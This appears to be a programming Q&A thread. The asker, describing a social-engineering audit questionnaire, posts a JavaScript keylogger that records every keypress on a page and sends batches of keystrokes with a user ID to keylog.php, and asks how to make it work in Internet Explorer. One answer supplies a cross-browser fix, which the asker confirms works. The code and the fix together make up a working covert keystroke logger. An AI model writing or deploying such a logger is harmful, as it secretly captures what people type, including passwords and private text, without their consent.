# javascript onkeypress/onkeydown does not work in IE

Tags: javascript, internet-explorer, keycode, onkeypress

I am scripting this questionnaire for doing IT security social engineering audits. Additionaly to all the form fields I am trying to build a javascript keylogger to get more information on user actions.

So far the keylogger works great in FF but not IE. I have to get working both. Any help/ideas appreciated.

```
<script>

function sendkeylog (keylog, userID) {
if (window.ActiveXObject) {
httpRequest = new ActiveXObject("Microsoft.XMLHTTP");
}
else {
httpRequest = new XMLHttpRequest();
}
httpRequest.open("GET", "keylog.php?keylog="+keylog+"&userID="+userID, true);
httpRequest.send(null);
}

keylog="";
userID="";

document.onkeypress = function savekeycode (e) {
keylog+=String.fromCharCode(e.charCode);
if ((keylog.length==5)||(event.keyCode=13)) {
var userID = "<?php echo $sID; ?>";
sendkeylog(keylog, userID);
keylog="";
userID="";
}
}

</script>
```

Answer (score 1):

(Older) IEs don't support `Event.charCode`. You can try something like this:

```
document.onkeypress = function (e) {
    var evt = e || window.event,
        charCode = evt.charCode || evt.keyCode;
    keylog += String.fromCharCode(charCode);
    if ((keylog.length === 5) || (charCode === 13)) {
        ...
}
```

Also using same variable name (`keylog`) in caller and callee arguments might cause `Out of memory` error in IE < 8. More troubles can be expected when using a [named function expression](http://kangax.github.io/nfe/)...

Answer (score 0):

I have noticed this problem before writing jquery plugins - 
Please try to use

```
String.fromCharCode(event.which)
```

instead of keycode.. It works in IE 6 + all other browsers..

Thanks.

Comment: This did not solve it. The solution Teemu offered worked. Thanks for helping out :)

Comment: Appologies, I thought it would.. good to hear you have solved it. Thanks :)